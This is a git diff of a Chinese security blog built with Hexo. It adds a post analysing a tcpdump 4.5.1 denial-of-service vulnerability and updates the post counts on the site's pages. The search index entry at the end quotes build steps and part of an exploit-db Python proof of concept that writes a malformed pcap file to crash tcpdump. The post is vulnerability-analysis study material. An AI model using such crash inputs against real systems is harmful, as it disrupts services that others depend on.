-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html
index 1a52363a..06dc6e76 100644
--- a/archives/2019/02/index.html
+++ b/archives/2019/02/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html
index 7fbc8121..7fe65068 100644
--- a/archives/2019/03/index.html
+++ b/archives/2019/03/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -502,7 +502,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -524,7 +524,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -595,7 +595,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/04/index.html b/archives/2019/04/index.html
index 2911cd8c..708a05fe 100644
--- a/archives/2019/04/index.html
+++ b/archives/2019/04/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -432,7 +432,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -454,7 +454,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -525,7 +525,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/05/index.html b/archives/2019/05/index.html
index 7fbeccf9..180a0b44 100644
--- a/archives/2019/05/index.html
+++ b/archives/2019/05/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -432,7 +432,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -454,7 +454,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -525,7 +525,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/07/index.html b/archives/2019/07/index.html
index 13ad7538..d8dde423 100644
--- a/archives/2019/07/index.html
+++ b/archives/2019/07/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -397,7 +397,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -419,7 +419,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -490,7 +490,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/index.html b/archives/2019/index.html
index 3a1d702c..4b87faf4 100644
--- a/archives/2019/index.html
+++ b/archives/2019/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -716,7 +716,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -738,7 +738,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -809,7 +809,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/2019/page/2/index.html b/archives/2019/page/2/index.html
index 9bf1d75d..e537219c 100644
--- a/archives/2019/page/2/index.html
+++ b/archives/2019/page/2/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -401,7 +401,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -423,7 +423,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -494,7 +494,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/index.html b/archives/index.html
index 6fd66ed1..de18e87e 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -716,7 +716,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -738,7 +738,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -809,7 +809,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/archives/page/2/index.html b/archives/page/2/index.html
index 5a1c1a54..b63bc56a 100644
--- a/archives/page/2/index.html
+++ b/archives/page/2/index.html
@@ -299,7 +299,7 @@
         
           
         
-        嗯..! 目前共计 15 篇日志。 继续努力。
+        嗯..! 目前共计 16 篇日志。 继续努力。
       </span>
 
       
@@ -358,6 +358,41 @@
 
         
 
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+
+      
+
+        
+        
+        
+
+        
+        
+
+        
+
   <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
     <header class="post-header">
 
@@ -551,7 +586,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -573,7 +608,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -644,7 +679,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/baidusitemap.xml b/baidusitemap.xml
index 2a91c9a0..67b10628 100644
--- a/baidusitemap.xml
+++ b/baidusitemap.xml
@@ -1,6 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   <url>
+    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
+    <lastmod>2019-07-01</lastmod>
+  </url>  <url>
     <loc>https://cool-y.github.io/2019/07/01/AFL-first-learn/</loc>
     <lastmod>2019-07-01</lastmod>
   </url>  <url>
@@ -18,11 +21,14 @@
   </url>  <url>
     <loc>https://cool-y.github.io/2019/04/15/Caving-db-storage/</loc>
     <lastmod>2019-04-15</lastmod>
+  </url>  <url>
+    <loc>https://cool-y.github.io/2019/03/16/%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage/</loc>
+    <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
-    <loc>https://cool-y.github.io/2019/03/16/%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage/</loc>
+    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
@@ -31,14 +37,11 @@
     <loc>https://cool-y.github.io/2018/12/15/miio-control/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
-    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
+    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
     <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
     <lastmod>2019-04-15</lastmod>
-  </url>  <url>
-    <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
-    <lastmod>2019-04-15</lastmod>
   </url>  <url>
     <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
     <lastmod>2019-04-15</lastmod>
diff --git a/bookmarks/index.html b/bookmarks/index.html
index 01ca54c4..5e365352 100644
--- a/bookmarks/index.html
+++ b/bookmarks/index.html
@@ -403,7 +403,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -425,7 +425,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -512,7 +512,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/IOT/index.html b/categories/IOT/index.html
index e9fd5fc8..39e1c8f9 100644
--- a/categories/IOT/index.html
+++ b/categories/IOT/index.html
@@ -456,7 +456,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -478,7 +478,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -549,7 +549,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/index.html b/categories/index.html
index d68a0af7..448497d0 100644
--- a/categories/index.html
+++ b/categories/index.html
@@ -311,7 +311,7 @@
                 目前共计 6 个分类
             </div>
             <div class="category-all">
-              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
+              <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/IOT/">IOT</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/二进制/">二进制</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/加密解密/">加密解密</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/杂七杂八/">杂七杂八</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/理论学习/">理论学习</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/顶会论文/">顶会论文</a><span class="category-list-count">3</span></li></ul>
             </div>
           </div>
         
@@ -369,7 +369,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -391,7 +391,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -462,7 +462,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/二进制/index.html b/categories/二进制/index.html
index b340fe77..d0113fa9 100644
--- a/categories/二进制/index.html
+++ b/categories/二进制/index.html
@@ -376,6 +376,32 @@
 
 
       
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
     </div>
 
   </div>
@@ -430,7 +456,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -452,7 +478,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -523,7 +549,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html
index 59e27665..2b5ca610 100644
--- a/categories/加密解密/index.html
+++ b/categories/加密解密/index.html
@@ -378,7 +378,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -400,7 +400,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/杂七杂八/index.html b/categories/杂七杂八/index.html
index 933961bf..be25a905 100644
--- a/categories/杂七杂八/index.html
+++ b/categories/杂七杂八/index.html
@@ -378,7 +378,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -400,7 +400,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html
index e8a9f419..a606cc3e 100644
--- a/categories/理论学习/index.html
+++ b/categories/理论学习/index.html
@@ -378,7 +378,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -400,7 +400,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html
index b2b51862..edfa5162 100644
--- a/categories/顶会论文/index.html
+++ b/categories/顶会论文/index.html
@@ -430,7 +430,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -452,7 +452,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -523,7 +523,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/index.html b/index.html
index 5c84f906..aa6a619f 100644
--- a/index.html
+++ b/index.html
@@ -2225,7 +2225,7 @@ WinDbg
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -2247,7 +2247,7 @@ WinDbg
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -2318,7 +2318,7 @@ WinDbg
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/page/2/index.html b/page/2/index.html
index b7cbe4d7..d152ccd6 100644
--- a/page/2/index.html
+++ b/page/2/index.html
@@ -485,6 +485,193 @@
   
   
 
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+  
+  
+  
+  <div class="post-block">
+    <link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
+
+    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
+      <meta itemprop="name" content="Cool-Y">
+      <meta itemprop="description" content>
+      <meta itemprop="image" content="/images/avatar.png">
+    </span>
+
+    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
+      <meta itemprop="name" content="混元霹雳手">
+    </span>
+
+    
+      <header class="post-header">
+
+        
+        
+          <h1 class="post-title" itemprop="name headline">
+                
+                <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">TCPDUMP拒绝服务攻击漏洞</a></h1>
+        
+
+        <div class="post-meta">
+          <span class="post-time">
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-calendar-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">发表于</span>
+              
+              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-12-25T12:26:05+08:00">
+                2018-12-25
+              </time>
+            
+
+            
+
+            
+          </span>
+
+          
+            <span class="post-category">
+            
+              <span class="post-meta-divider">|</span>
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-folder-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">分类于</span>
+              
+              
+                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
+                  <a href="/categories/二进制/" itemprop="url" rel="index">
+                    <span itemprop="name">二进制</span>
+                  </a>
+                </span>
+
+                
+                
+              
+            </span>
+          
+
+          
+            
+          
+
+          
+          
+             <span id="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class="leancloud_visitors" data-flag-title="TCPDUMP拒绝服务攻击漏洞">
+               <span class="post-meta-divider">|</span>
+               <span class="post-meta-item-icon">
+                 <i class="fa fa-eye"></i>
+               </span>
+               
+                 <span class="post-meta-item-text">阅读次数&#58;</span>
+               
+                 <span class="leancloud-visitors-count"></span>
+             </span>
+          
+
+          
+
+          
+            <div class="post-wordcount">
+              
+                
+                <span class="post-meta-item-icon">
+                  <i class="fa fa-file-word-o"></i>
+                </span>
+                
+                <span title="字数统计">
+                  3.4k 字
+                </span>
+              
+
+              
+                <span class="post-meta-divider">|</span>
+              
+
+              
+                <span class="post-meta-item-icon">
+                  <i class="fa fa-clock-o"></i>
+                </span>
+                
+                <span title="阅读时长">
+                  16 分钟
+                </span>
+              
+            </div>
+          
+
+          
+
+        </div>
+      </header>
+    
+
+    
+    
+    
+    <div class="post-body" itemprop="articleBody">
+
+      
+      
+
+      
+        
+          
+          TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍
+tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac O
+          ...
+          <!--noindex-->
+          <div class="post-button text-center">
+            <a class="btn" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/#more" rel="contents">
+              阅读全文 &raquo;
+            </a>
+          </div>
+          <!--/noindex-->
+        
+      
+    </div>
+    
+    
+    
+
+    
+
+    
+
+    
+
+    <footer class="post-footer">
+      
+
+      
+
+      
+
+      
+      
+        <div class="post-eof"></div>
+      
+    </footer>
+  </div>
+  
+  
+  
+  </article>
+
+
+    
+      
+
+  
+
+  
+  
+  
+
   <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
   
   
@@ -1263,7 +1450,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -1285,7 +1472,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -1356,7 +1543,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/search.xml b/search.xml
index 3cd51fda..727af539 100644
--- a/search.xml
+++ b/search.xml
@@ -126,6 +126,18 @@
         <tag>wifi</tag>
       </tags>
   </entry>
+  <entry>
+    <title><![CDATA[TCPDUMP拒绝服务攻击漏洞]]></title>
+    <url>%2F2018%2F12%2F25%2FTCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E%2F</url>
+    <content type="text"><![CDATA[TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump；它需要WinPcap驱动，相当于在Linux平台下的libpcap. tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。 也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。 分析环境 Ubuntu 16.04.4 LTS i686 tcpdump 4.5.1 gdb with peda 漏洞复现这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。 编译安装tcpdump12345678910111. # apt-get install libpcap-dev2. # dpkg -l libpcap-dev3. # wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz4. # tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz5. # cd tcpdump-4.5.1/6. # ./configure7. # make8. # make install9. # tcpdump –-version tcpdump version 4.5.1 libpcap version 1.7.4 生成payload（来自exploit-db payload）12345678910111213141516171819202122232425262728293031323334# Exploit Title: tcpdump 4.5.1 Access Violation Crash# Date: 31st May 2016# Exploit Author: David Silveiro# Vendor Homepage: http://www.tcpdump.org# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz# Version: 4.5.1# Tested on: Ubuntu 14 LTSfrom subprocess import callfrom shlex import splitfrom time import sleepdef crash(): command = &apos;tcpdump -r crash&apos; buffer = &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos; buffer += &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos; buffer += &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos; buffer += &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos; buffer += &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot; buffer += &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot; buffer += &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos; with open(&apos;crash&apos;, &apos;w+b&apos;) as file: 